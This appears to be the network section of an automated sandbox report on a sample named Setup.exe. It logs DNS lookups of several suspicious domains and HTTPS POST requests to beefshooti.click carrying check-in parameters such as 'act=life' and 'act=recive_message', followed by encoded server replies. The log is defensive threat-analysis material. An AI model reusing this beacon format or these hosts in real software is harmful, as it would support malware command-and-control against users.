Dec 24, 2024 01:12:23.711915016 CET	49734	443	192.168.2.4	104.21.18.185
Dec 24, 2024 01:12:23.712033987 CET	49734	443	192.168.2.4	104.21.18.185
Dec 24, 2024 01:12:23.712075949 CET	443	49734	104.21.18.185	192.168.2.4
Dec 24, 2024 01:12:24.576316118 CET	443	49734	104.21.18.185	192.168.2.4
Dec 24, 2024 01:12:24.576402903 CET	443	49734	104.21.18.185	192.168.2.4
Dec 24, 2024 01:12:24.576462030 CET	49734	443	192.168.2.4	104.21.18.185
Dec 24, 2024 01:12:24.577353954 CET	49734	443	192.168.2.4	104.21.18.185
Dec 24, 2024 01:12:24.577399969 CET	443	49734	104.21.18.185	192.168.2.4
Dec 24, 2024 01:12:25.206831932 CET	49738	443	192.168.2.4	104.21.18.185
Dec 24, 2024 01:12:25.206856966 CET	443	49738	104.21.18.185	192.168.2.4
Dec 24, 2024 01:12:25.206918955 CET	49738	443	192.168.2.4	104.21.18.185
Dec 24, 2024 01:12:25.207277060 CET	49738	443	192.168.2.4	104.21.18.185
Dec 24, 2024 01:12:25.207288027 CET	443	49738	104.21.18.185	192.168.2.4
Dec 24, 2024 01:12:26.423213959 CET	443	49738	104.21.18.185	192.168.2.4
Dec 24, 2024 01:12:26.423290968 CET	49738	443	192.168.2.4	104.21.18.185
Dec 24, 2024 01:12:26.424520969 CET	49738	443	192.168.2.4	104.21.18.185
Dec 24, 2024 01:12:26.424527884 CET	443	49738	104.21.18.185	192.168.2.4
Dec 24, 2024 01:12:26.424762964 CET	443	49738	104.21.18.185	192.168.2.4
Dec 24, 2024 01:12:26.431282043 CET	49738	443	192.168.2.4	104.21.18.185
Dec 24, 2024 01:12:26.431397915 CET	49738	443	192.168.2.4	104.21.18.185
Dec 24, 2024 01:12:26.431428909 CET	443	49738	104.21.18.185	192.168.2.4
Dec 24, 2024 01:12:26.431488991 CET	49738	443	192.168.2.4	104.21.18.185
Dec 24, 2024 01:12:26.431494951 CET	443	49738	104.21.18.185	192.168.2.4
Dec 24, 2024 01:12:27.412266970 CET	443	49738	104.21.18.185	192.168.2.4
Dec 24, 2024 01:12:27.412357092 CET	443	49738	104.21.18.185	192.168.2.4
Dec 24, 2024 01:12:27.412434101 CET	49738	443	192.168.2.4	104.21.18.185
Dec 24, 2024 01:12:27.449170113 CET	49738	443	192.168.2.4	104.21.18.185
Dec 24, 2024 01:12:27.449184895 CET	443	49738	104.21.18.185	192.168.2.4
Dec 24, 2024 01:12:28.132872105 CET	49740	443	192.168.2.4	104.21.18.185
Dec 24, 2024 01:12:28.132905006 CET	443	49740	104.21.18.185	192.168.2.4
Dec 24, 2024 01:12:28.132992029 CET	49740	443	192.168.2.4	104.21.18.185
Dec 24, 2024 01:12:28.133296967 CET	49740	443	192.168.2.4	104.21.18.185
Dec 24, 2024 01:12:28.133316994 CET	443	49740	104.21.18.185	192.168.2.4
Dec 24, 2024 01:12:29.474338055 CET	443	49740	104.21.18.185	192.168.2.4
Dec 24, 2024 01:12:29.474433899 CET	49740	443	192.168.2.4	104.21.18.185
Dec 24, 2024 01:12:29.475505114 CET	49740	443	192.168.2.4	104.21.18.185
Dec 24, 2024 01:12:29.475533009 CET	443	49740	104.21.18.185	192.168.2.4
Dec 24, 2024 01:12:29.475769997 CET	443	49740	104.21.18.185	192.168.2.4
Dec 24, 2024 01:12:29.484091043 CET	49740	443	192.168.2.4	104.21.18.185
Dec 24, 2024 01:12:29.484158039 CET	49740	443	192.168.2.4	104.21.18.185
Dec 24, 2024 01:12:29.484174013 CET	443	49740	104.21.18.185	192.168.2.4
Dec 24, 2024 01:12:30.279701948 CET	443	49740	104.21.18.185	192.168.2.4
Dec 24, 2024 01:12:30.279794931 CET	443	49740	104.21.18.185	192.168.2.4
Dec 24, 2024 01:12:30.280008078 CET	49740	443	192.168.2.4	104.21.18.185
Dec 24, 2024 01:12:30.280008078 CET	49740	443	192.168.2.4	104.21.18.185
Dec 24, 2024 01:12:30.384543896 CET	49742	443	192.168.2.4	104.21.18.185
Dec 24, 2024 01:12:30.384612083 CET	443	49742	104.21.18.185	192.168.2.4
Dec 24, 2024 01:12:30.384721994 CET	49742	443	192.168.2.4	104.21.18.185
Dec 24, 2024 01:12:30.385082960 CET	49742	443	192.168.2.4	104.21.18.185
Dec 24, 2024 01:12:30.385133028 CET	443	49742	104.21.18.185	192.168.2.4
Dec 24, 2024 01:12:30.594530106 CET	49740	443	192.168.2.4	104.21.18.185
Dec 24, 2024 01:12:30.594571114 CET	443	49740	104.21.18.185	192.168.2.4
Dec 24, 2024 01:12:31.599113941 CET	443	49742	104.21.18.185	192.168.2.4
Dec 24, 2024 01:12:31.599206924 CET	49742	443	192.168.2.4	104.21.18.185
Dec 24, 2024 01:12:31.600414991 CET	49742	443	192.168.2.4	104.21.18.185
Dec 24, 2024 01:12:31.600438118 CET	443	49742	104.21.18.185	192.168.2.4
Dec 24, 2024 01:12:31.600655079 CET	443	49742	104.21.18.185	192.168.2.4
Dec 24, 2024 01:12:31.612008095 CET	49742	443	192.168.2.4	104.21.18.185
Dec 24, 2024 01:12:31.612113953 CET	49742	443	192.168.2.4	104.21.18.185
Dec 24, 2024 01:12:31.612128019 CET	443	49742	104.21.18.185	192.168.2.4
Dec 24, 2024 01:12:32.277230024 CET	443	49742	104.21.18.185	192.168.2.4
Dec 24, 2024 01:12:32.277285099 CET	443	49742	104.21.18.185	192.168.2.4
Dec 24, 2024 01:12:32.277363062 CET	49742	443	192.168.2.4	104.21.18.185
Dec 24, 2024 01:12:32.277627945 CET	49742	443	192.168.2.4	104.21.18.185
Dec 24, 2024 01:12:32.277662039 CET	443	49742	104.21.18.185	192.168.2.4
Dec 24, 2024 01:12:32.330996037 CET	49743	443	192.168.2.4	104.21.18.185
Dec 24, 2024 01:12:32.331073046 CET	443	49743	104.21.18.185	192.168.2.4
Dec 24, 2024 01:12:32.331195116 CET	49743	443	192.168.2.4	104.21.18.185
Dec 24, 2024 01:12:32.331598043 CET	49743	443	192.168.2.4	104.21.18.185
Dec 24, 2024 01:12:32.331648111 CET	443	49743	104.21.18.185	192.168.2.4
Dec 24, 2024 01:12:33.567720890 CET	443	49743	104.21.18.185	192.168.2.4
Dec 24, 2024 01:12:33.567800999 CET	49743	443	192.168.2.4	104.21.18.185
Dec 24, 2024 01:12:33.569417000 CET	49743	443	192.168.2.4	104.21.18.185
Dec 24, 2024 01:12:33.569436073 CET	443	49743	104.21.18.185	192.168.2.4
Dec 24, 2024 01:12:33.569644928 CET	443	49743	104.21.18.185	192.168.2.4
Dec 24, 2024 01:12:33.570832968 CET	49743	443	192.168.2.4	104.21.18.185
Dec 24, 2024 01:12:33.570873022 CET	49743	443	192.168.2.4	104.21.18.185
Dec 24, 2024 01:12:33.570904016 CET	443	49743	104.21.18.185	192.168.2.4
Dec 24, 2024 01:12:34.346568108 CET	443	49743	104.21.18.185	192.168.2.4
Dec 24, 2024 01:12:34.346626997 CET	443	49743	104.21.18.185	192.168.2.4
Dec 24, 2024 01:12:34.346716881 CET	49743	443	192.168.2.4	104.21.18.185
Dec 24, 2024 01:12:34.347031116 CET	49743	443	192.168.2.4	104.21.18.185
Dec 24, 2024 01:12:34.347031116 CET	49743	443	192.168.2.4	104.21.18.185
Dec 24, 2024 01:12:34.347064972 CET	443	49743	104.21.18.185	192.168.2.4
Dec 24, 2024 01:12:34.347131968 CET	443	49743	104.21.18.185	192.168.2.4
Dec 24, 2024 01:12:34.493489027 CET	49744	443	192.168.2.4	104.21.27.229
Dec 24, 2024 01:12:34.493515015 CET	443	49744	104.21.27.229	192.168.2.4
Dec 24, 2024 01:12:34.493606091 CET	49744	443	192.168.2.4	104.21.27.229
Dec 24, 2024 01:12:34.494054079 CET	49744	443	192.168.2.4	104.21.27.229
Dec 24, 2024 01:12:34.494064093 CET	443	49744	104.21.27.229	192.168.2.4
Dec 24, 2024 01:12:35.867929935 CET	443	49744	104.21.27.229	192.168.2.4
Dec 24, 2024 01:12:35.868046045 CET	49744	443	192.168.2.4	104.21.27.229
Dec 24, 2024 01:12:35.872976065 CET	49744	443	192.168.2.4	104.21.27.229
Dec 24, 2024 01:12:35.872982979 CET	443	49744	104.21.27.229	192.168.2.4
Dec 24, 2024 01:12:35.873250961 CET	443	49744	104.21.27.229	192.168.2.4
Dec 24, 2024 01:12:35.874869108 CET	49744	443	192.168.2.4	104.21.27.229
Dec 24, 2024 01:12:35.915383101 CET	443	49744	104.21.27.229	192.168.2.4
Dec 24, 2024 01:12:36.494803905 CET	443	49744	104.21.27.229	192.168.2.4
Dec 24, 2024 01:12:36.494848013 CET	443	49744	104.21.27.229	192.168.2.4
Dec 24, 2024 01:12:36.495192051 CET	49744	443	192.168.2.4	104.21.27.229
Dec 24, 2024 01:12:36.495328903 CET	49744	443	192.168.2.4	104.21.27.229
Dec 24, 2024 01:12:36.495338917 CET	443	49744	104.21.27.229	192.168.2.4
Dec 24, 2024 01:12:36.495368958 CET	49744	443	192.168.2.4	104.21.27.229
Dec 24, 2024 01:12:36.495373964 CET	443	49744	104.21.27.229	192.168.2.4

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 24, 2024 01:12:14.984447002 CET	57906	53	192.168.2.4	1.1.1.1
Dec 24, 2024 01:12:15.300973892 CET	53	57906	1.1.1.1	192.168.2.4
Dec 24, 2024 01:12:34.350322962 CET	54239	53	192.168.2.4	1.1.1.1
Dec 24, 2024 01:12:34.492738962 CET	53	54239	1.1.1.1	192.168.2.4
Dec 24, 2024 01:12:36.519490957 CET	53544	53	192.168.2.4	1.1.1.1
Dec 24, 2024 01:12:36.736624956 CET	53	53544	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Dec 24, 2024 01:12:14.984447002 CET	192.168.2.4	1.1.1.1	0x84cf	Standard query (0)	beefshooti.click	A (IP address)	IN (0x0001)	false
Dec 24, 2024 01:12:34.350322962 CET	192.168.2.4	1.1.1.1	0xda30	Standard query (0)	neqi.shop	A (IP address)	IN (0x0001)	false
Dec 24, 2024 01:12:36.519490957 CET	192.168.2.4	1.1.1.1	0x627c	Standard query (0)	klipcatepiu0.shop	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Dec 24, 2024 01:12:15.300973892 CET	1.1.1.1	192.168.2.4	0x84cf	No error (0)	beefshooti.click		104.21.18.185	A (IP address)	IN (0x0001)	false
Dec 24, 2024 01:12:15.300973892 CET	1.1.1.1	192.168.2.4	0x84cf	No error (0)	beefshooti.click		172.67.183.30	A (IP address)	IN (0x0001)	false
Dec 24, 2024 01:12:34.492738962 CET	1.1.1.1	192.168.2.4	0xda30	No error (0)	neqi.shop		104.21.27.229	A (IP address)	IN (0x0001)	false
Dec 24, 2024 01:12:34.492738962 CET	1.1.1.1	192.168.2.4	0xda30	No error (0)	neqi.shop		172.67.169.205	A (IP address)	IN (0x0001)	false
Dec 24, 2024 01:12:36.736624956 CET	1.1.1.1	192.168.2.4	0x627c	Name error (3)	klipcatepiu0.shop	none	none	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

beefshooti.click

neqi.shop

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49730	104.21.18.185	443	6596	C:\Users\user\Desktop\Setup.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-24 00:12:16 UTC	263	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: beefshooti.click
2024-12-24 00:12:16 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-12-24 00:12:17 UTC	1121	IN	HTTP/1.1 200 OK Date: Tue, 24 Dec 2024 00:12:17 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=jokvc5810e0g8uub8fci7mepmi; expires=Fri, 18 Apr 2025 17:58:56 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=b4g5kQ38QwQiI1chA6EBvSPUe3ZdrxjsfdPEF3mL7LkI5hyPZ7Y09JFUMwbUe%2BmIUqJfg88AQfHryvQKZ9mOmQ%2BZxK1P1n3V%2FmXzHJgdZuT7GEp2efqsBG49HjUKK5o7olzO"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f6c60fd0eea0f9f-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1491&min_rtt=1487&rtt_var=566&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2841&recv_bytes=907&delivery_rate=1918528&cwnd=213&unsent_bytes=0&cid=3cc8c64932c1c23c&ts=770&x=0"
2024-12-24 00:12:17 UTC	7	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
2024-12-24 00:12:17 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49731	104.21.18.185	443	6596	C:\Users\user\Desktop\Setup.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-24 00:12:18 UTC	264	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 79 Host: beefshooti.click
2024-12-24 00:12:18 UTC	79	OUT	Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 6a 4d 77 31 49 45 2d 2d 42 41 52 4e 49 26 6a 3d 61 61 37 37 65 37 38 62 36 62 30 64 64 31 62 32 32 32 36 65 37 62 37 39 39 35 33 32 61 62 33 61 Data Ascii: act=recive_message&ver=4.0&lid=jMw1IE--BARNI&j=aa77e78b6b0dd1b2226e7b799532ab3a
2024-12-24 00:12:19 UTC	1129	IN	HTTP/1.1 200 OK Date: Tue, 24 Dec 2024 00:12:19 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=65i2f5ogss1ul4jmlr4n684g8f; expires=Fri, 18 Apr 2025 17:58:58 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=eIYep%2BO2Qe2y%2Fze7j5qEt4Bk1RHC7EnNS9QUbOzYookQqL%2BlYXEqO%2BKazTO7IhBUzeg0xC3L4DeXRDgeG0Q6d8e%2Bl0%2FB%2B7e1SuiXz6RNRpVPBgtM7FIE2ToQfLeQW954uHXJ"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f6c6109cd428c60-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=8021&min_rtt=2650&rtt_var=4449&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2842&recv_bytes=979&delivery_rate=1101886&cwnd=67&unsent_bytes=0&cid=85bd5c0407d13a50&ts=769&x=0"
2024-12-24 00:12:19 UTC	240	IN	Data Raw: 31 63 62 32 0d 0a 70 63 2f 6e 55 65 32 70 66 51 59 68 75 43 6a 49 54 54 32 70 32 79 4b 72 53 66 6c 44 58 4b 7a 5a 78 6d 36 31 6b 45 4f 55 66 30 4c 65 37 5a 46 7a 31 35 31 52 4a 46 4c 64 43 76 49 72 58 4d 57 6f 52 34 64 72 6d 43 64 2b 6c 72 2b 6e 41 73 62 31 62 37 59 4a 4c 34 66 31 67 54 43 42 32 68 67 71 41 39 31 51 36 6e 64 6d 30 76 6c 48 78 57 76 44 59 54 6e 47 75 36 63 43 31 2f 45 6f 2b 77 38 75 78 71 65 4c 4e 6f 58 4d 48 6d 4a 41 31 45 57 74 4b 46 6a 49 73 55 7a 43 4a 4a 45 75 66 6f 44 37 6f 78 53 58 71 6d 48 5a 47 6a 62 45 67 6f 59 69 68 6f 73 41 4b 6c 71 61 54 61 5a 76 42 34 75 36 52 38 6b 6c 6e 79 63 33 78 4c 47 75 43 74 62 30 4b 65 51 57 4a 4d 32 6e 68 54 57 45 78 68 64 32 54 64 35 43 70 69 35 53 79 50 Data Ascii: 1cb2pc/nUe2pfQYhuCjITT2p2yKrSflDXKzZxm61kEOUf0Le7ZFz151RJFLdCvIrXMWoR4drmCd+lr+nAsb1b7YJL4f1gTCB2hgqA91Q6ndm0vlHxWvDYTnGu6cC1/Eo+w8uxqeLNoXMHmJA1EWtKFjIsUzCJJEufoD7oxSXqmHZGjbEgoYihosAKlqaTaZvB4u6R8klnyc3xLGuCtb0KeQWJM2nhTWExhd2Td5Cpi5SyP
2024-12-24 00:12:19 UTC	1369	IN	Data Raw: 6b 4f 69 53 79 44 59 57 61 4f 36 4a 59 50 78 75 4d 30 2b 77 30 6d 68 37 4c 4c 4b 73 2f 4d 45 79 51 62 6d 6b 4b 6d 49 56 72 49 74 6b 66 49 4b 34 6b 75 50 73 32 7a 72 41 6a 64 2f 53 37 35 45 79 72 41 70 59 77 30 67 4d 77 58 59 6b 7a 5a 43 75 52 76 57 4e 50 35 47 49 6b 4c 69 79 49 39 32 72 61 31 54 4d 69 38 4f 4c 59 61 4c 49 66 31 78 54 57 42 79 68 4a 6b 55 64 4a 42 6f 53 70 4e 77 4c 42 4e 78 43 75 57 4b 7a 48 4e 75 36 4d 47 33 66 30 72 38 68 41 74 77 61 32 46 63 38 47 4c 47 48 77 44 67 67 71 4a 4b 6b 2f 4d 74 56 61 4c 45 64 73 2b 63 4e 66 37 6f 77 43 58 71 6d 48 2b 47 43 50 45 70 6f 6f 77 68 38 41 4e 5a 46 48 63 52 36 38 39 57 63 36 33 53 73 6f 35 6b 53 38 34 7a 62 4b 76 42 64 4c 31 4a 62 5a 54 59 4d 43 31 78 57 76 50 36 68 4a 76 54 39 42 64 71 6d 39 41 68 Data Ascii: kOiSyDYWaO6JYPxuM0+w0mh7LLKs/MEyQbmkKmIVrItkfIK4kuPs2zrAjd/S75EyrApYw0gMwXYkzZCuRvWNP5GIkLiyI92ra1TMi8OLYaLIf1xTWByhJkUdJBoSpNwLBNxCuWKzHNu6MG3f0r8hAtwa2Fc8GLGHwDggqJKk/MtVaLEds+cNf7owCXqmH+GCPEpoowh8ANZFHcR689Wc63Sso5kS84zbKvBdL1JbZTYMC1xWvP6hJvT9Bdqm9Ah
2024-12-24 00:12:19 UTC	1369	IN	Data Raw: 35 6c 79 73 34 77 62 61 6f 54 4a 6d 79 4a 75 35 64 65 49 65 48 68 69 65 4d 77 56 31 52 51 4e 52 45 72 54 6b 66 31 50 64 5a 69 53 79 58 59 57 61 4f 74 71 55 45 30 65 41 75 2b 78 34 75 79 61 4b 41 50 49 66 4c 48 32 6c 47 33 6b 47 68 4c 46 4c 50 71 30 72 4a 49 35 34 67 4e 4d 54 37 36 6b 7a 51 36 6d 47 75 58 52 48 51 70 73 63 47 6a 4d 55 52 59 31 57 61 56 65 51 32 48 38 79 31 41 4a 46 72 6c 69 6b 37 79 37 53 6c 42 74 6e 33 4b 2f 6f 56 4c 73 53 2f 69 6a 65 50 78 78 64 75 54 74 52 4f 6f 69 5a 55 77 4c 39 41 79 43 48 62 62 33 37 4a 6f 2b 52 55 6c 38 59 6d 2b 68 41 76 68 5a 69 47 50 59 48 4d 43 53 52 63 6c 46 50 71 4b 46 4f 4c 34 51 44 46 49 70 73 71 4e 4d 71 37 6f 77 48 53 38 53 62 31 45 43 66 4e 6f 34 49 33 67 38 49 53 59 6b 50 64 54 71 38 39 57 73 4b 31 54 49 Data Ascii: 5lys4wbaoTJmyJu5deIeHhieMwV1RQNRErTkf1PdZiSyXYWaOtqUE0eAu+x4uyaKAPIfLH2lG3kGhLFLPq0rJI54gNMT76kzQ6mGuXRHQpscGjMURY1WaVeQ2H8y1AJFrlik7y7SlBtn3K/oVLsS/ijePxxduTtROoiZUwL9AyCHbb37Jo+RUl8Ym+hAvhZiGPYHMCSRclFPqKFOL4QDFIpsqNMq7owHS8Sb1ECfNo4I3g8ISYkPdTq89WsK1TI
2024-12-24 00:12:19 UTC	1369	IN	Data Raw: 66 74 48 31 76 55 7a 51 2f 6d 47 75 58 53 6e 4f 76 34 73 39 68 73 59 5a 62 45 54 55 52 36 45 70 56 4d 79 2b 52 73 51 6a 6c 69 51 39 7a 37 2b 75 48 74 54 35 4b 2f 73 58 59 49 6e 74 67 69 76 50 6b 31 39 44 54 2f 4e 61 73 54 31 4a 69 36 59 4f 30 47 75 63 4c 58 36 57 2b 36 63 44 33 76 30 70 2f 68 49 76 77 36 4f 44 4e 59 4c 4f 45 47 35 52 30 6b 53 6e 4a 46 44 41 71 30 44 45 4c 35 63 6c 4e 73 57 78 35 45 4b 58 39 54 6d 32 52 57 44 79 6f 49 6f 7a 6a 4e 31 66 65 77 33 44 43 71 30 6a 48 35 50 35 54 4d 63 72 6c 43 30 79 78 62 4f 6c 41 4e 6e 31 4a 50 38 56 4b 4e 57 73 67 54 75 4f 78 52 42 6c 52 39 39 50 72 69 68 62 7a 62 59 41 68 32 75 63 4f 58 36 57 2b 34 73 72 34 72 41 41 7a 46 30 2f 69 62 54 46 4e 49 4f 4c 52 79 52 50 32 55 61 69 49 46 6e 43 74 55 72 41 49 4a 63 Data Ascii: ftH1vUzQ/mGuXSnOv4s9hsYZbETUR6EpVMy+RsQjliQ9z7+uHtT5K/sXYIntgivPk19DT/NasT1Ji6YO0GucLX6W+6cD3v0p/hIvw6ODNYLOEG5R0kSnJFDAq0DEL5clNsWx5EKX9Tm2RWDyoIozjN1few3DCq0jH5P5TMcrlC0yxbOlANn1JP8VKNWsgTuOxRBlR99PrihbzbYAh2ucOX6W+4sr4rAAzF0/ibTFNIOLRyRP2UaiIFnCtUrAIJc
2024-12-24 00:12:19 UTC	1369	IN	Data Raw: 4b 41 4a 32 50 4d 67 38 41 38 6e 7a 72 2b 4c 50 6f 44 44 46 32 31 43 33 6b 2b 6e 4b 56 50 42 75 45 66 48 4a 5a 4e 68 63 49 36 38 76 45 79 50 73 67 44 6d 42 6a 4c 52 6f 4b 51 2b 67 49 73 41 4b 6c 71 61 54 61 5a 76 42 34 75 77 55 73 30 6d 69 53 67 35 77 4c 53 6e 48 74 62 2f 4b 75 51 61 4c 38 4f 71 69 54 57 41 7a 52 35 68 53 64 5a 4e 72 79 52 51 78 2f 6b 4f 69 53 79 44 59 57 61 4f 6c 61 38 66 77 50 45 76 2f 51 73 37 68 37 4c 4c 4b 73 2f 4d 45 79 51 62 6d 6b 6d 68 4a 46 76 4c 74 55 44 4e 4a 70 73 7a 4d 63 6d 38 72 51 66 46 2b 43 62 78 46 69 6a 4d 6f 6f 4d 68 67 38 55 4e 59 56 48 49 43 75 52 76 57 4e 50 35 47 49 6b 64 6e 44 45 75 7a 66 6d 56 47 74 54 6b 4b 76 73 52 59 4e 6a 6a 6e 48 4f 49 78 31 38 38 41 39 78 46 6f 79 78 51 79 72 42 4d 78 43 36 53 4a 44 2f 49 Data Ascii: KAJ2PMg8A8nzr+LPoDDF21C3k+nKVPBuEfHJZNhcI68vEyPsgDmBjLRoKQ+gIsAKlqaTaZvB4uwUs0miSg5wLSnHtb/KuQaL8OqiTWAzR5hSdZNryRQx/kOiSyDYWaOla8fwPEv/Qs7h7LLKs/MEyQbmkmhJFvLtUDNJpszMcm8rQfF+CbxFijMooMhg8UNYVHICuRvWNP5GIkdnDEuzfmVGtTkKvsRYNjjnHOIx188A9xFoyxQyrBMxC6SJD/I
2024-12-24 00:12:19 UTC	1369	IN	Data Raw: 58 78 4f 72 59 43 62 74 37 74 67 6a 2f 50 6b 31 39 6e 52 4e 6c 4c 6f 43 5a 54 78 4c 35 45 32 79 47 63 4d 7a 2f 50 73 4b 6b 41 31 2f 38 73 2f 42 77 70 79 71 47 49 4e 49 6a 45 47 69 51 4e 6d 6b 32 79 62 77 65 4c 6d 45 33 43 4a 38 42 37 66 74 48 31 76 55 7a 51 2f 6d 47 75 58 53 44 4e 71 49 38 2b 6a 4d 51 63 64 6b 4c 63 57 4b 6f 69 56 64 6d 7a 53 38 77 6d 6c 69 77 39 79 4c 32 76 41 4d 58 37 49 66 55 57 59 49 6e 74 67 69 76 50 6b 31 39 48 56 4d 78 41 72 53 4e 4a 77 4c 68 44 33 79 61 4c 59 58 43 4f 71 71 4d 64 6c 36 6f 33 35 67 6f 6e 32 4f 4f 63 63 34 6a 48 58 7a 77 44 33 45 4f 73 4b 46 6e 46 71 30 58 50 4a 4a 51 6f 4e 38 71 7a 70 77 7a 54 39 69 62 7a 48 69 7a 4d 71 6f 59 38 69 38 49 52 62 55 79 61 42 4f 6f 6f 52 34 76 68 41 4f 67 77 6d 43 30 7a 6a 71 54 71 46 Data Ascii: XxOrYCbt7tgj/Pk19nRNlLoCZTxL5E2yGcMz/PsKkA1/8s/BwpyqGINIjEGiQNmk2ybweLmE3CJ8B7ftH1vUzQ/mGuXSDNqI8+jMQcdkLcWKoiVdmzS8wmliw9yL2vAMX7IfUWYIntgivPk19HVMxArSNJwLhD3yaLYXCOqqMdl6o35gon2OOcc4jHXzwD3EOsKFnFq0XPJJQoN8qzpwzT9ibzHizMqoY8i8IRbUyaBOooR4vhAOgwmC0zjqTqF
2024-12-24 00:12:19 UTC	269	IN	Data Raw: 32 47 6a 69 48 39 63 55 54 68 4e 30 61 59 31 57 59 66 36 6b 68 55 63 79 76 41 4e 59 55 31 57 45 2f 6a 75 4f 64 46 5a 66 6b 59 61 35 50 62 6f 65 2f 78 57 76 50 6a 42 78 32 55 64 78 4a 76 43 77 59 39 59 64 6e 33 79 47 63 4d 54 6e 5a 74 4f 52 43 6c 2f 31 68 72 69 52 67 7a 71 71 65 49 70 6e 47 44 32 4d 44 35 51 54 71 4e 78 2b 54 2b 58 58 4b 4a 5a 55 6d 4b 4e 2f 32 67 78 72 64 39 54 48 78 43 69 2b 48 34 38 55 31 7a 35 4e 4d 4b 67 50 65 57 2b 70 33 44 35 6e 69 46 5a 70 38 79 33 4d 68 67 4b 4c 6b 47 70 65 71 63 37 68 64 4d 6f 66 31 78 58 53 4d 32 51 31 69 51 4d 78 4a 37 52 46 68 37 4b 4e 4e 7a 7a 79 4b 48 77 44 4a 6f 61 6b 4b 77 4f 4e 74 34 78 34 75 79 61 71 54 63 38 47 4c 45 43 51 62 34 77 72 69 62 32 43 46 2b 56 69 4a 63 39 73 55 50 63 43 31 6f 78 72 47 76 77 Data Ascii: 2GjiH9cUThN0aY1WYf6khUcyvANYU1WE/juOdFZfkYa5Pboe/xWvPjBx2UdxJvCwY9Ydn3yGcMTnZtORCl/1hriRgzqqeIpnGD2MD5QTqNx+T+XXKJZUmKN/2gxrd9THxCi+H48U1z5NMKgPeW+p3D5niFZp8y3MhgKLkGpeqc7hdMof1xXSM2Q1iQMxJ7RFh7KNNzzyKHwDJoakKwONt4x4uyaqTc8GLECQb4wrib2CF+ViJc9sUPcC1oxrGvw
2024-12-24 00:12:19 UTC	1369	IN	Data Raw: 33 31 65 65 0d 0a 31 66 50 42 4f 55 43 71 34 2b 48 35 50 70 45 70 4a 2b 79 48 5a 75 6e 4b 54 71 46 5a 66 6b 59 61 35 50 62 6f 65 2f 78 57 76 50 6a 42 78 32 55 64 78 4a 76 43 77 59 39 59 64 75 7a 69 32 65 4a 69 36 4d 6c 61 38 59 30 4c 4a 76 74 68 4a 67 6e 35 54 46 65 38 2f 30 55 53 52 62 6d 68 4c 71 47 6c 7a 46 74 30 66 66 4f 74 59 50 4f 63 69 2b 6f 78 79 56 33 43 72 69 47 6d 43 4a 37 59 4e 7a 31 35 74 52 4a 45 66 4c 43 76 4a 2f 44 5a 44 73 45 35 35 37 79 54 35 77 31 2f 75 79 54 49 2b 67 62 37 59 50 59 4a 2f 74 77 6a 43 64 32 52 6c 6e 56 64 6b 4e 6c 42 46 63 33 62 52 50 77 69 71 6c 48 78 44 44 75 71 63 43 6c 63 4d 33 2b 77 30 6a 77 71 71 37 44 59 48 4d 43 32 4e 4e 33 45 72 71 59 52 2f 45 2b 52 6a 77 61 39 4e 68 41 59 44 37 76 45 79 50 73 68 54 31 45 79 37 Data Ascii: 31ee1fPBOUCq4+H5PpEpJ+yHZunKTqFZfkYa5Pboe/xWvPjBx2UdxJvCwY9Yduzi2eJi6Mla8Y0LJvthJgn5TFe8/0USRbmhLqGlzFt0ffOtYPOci+oxyV3CriGmCJ7YNz15tRJEfLCvJ/DZDsE557yT5w1/uyTI+gb7YPYJ/twjCd2RlnVdkNlBFc3bRPwiqlHxDDuqcClcM3+w0jwqq7DYHMC2NN3ErqYR/E+Rjwa9NhAYD7vEyPshT1Ey7
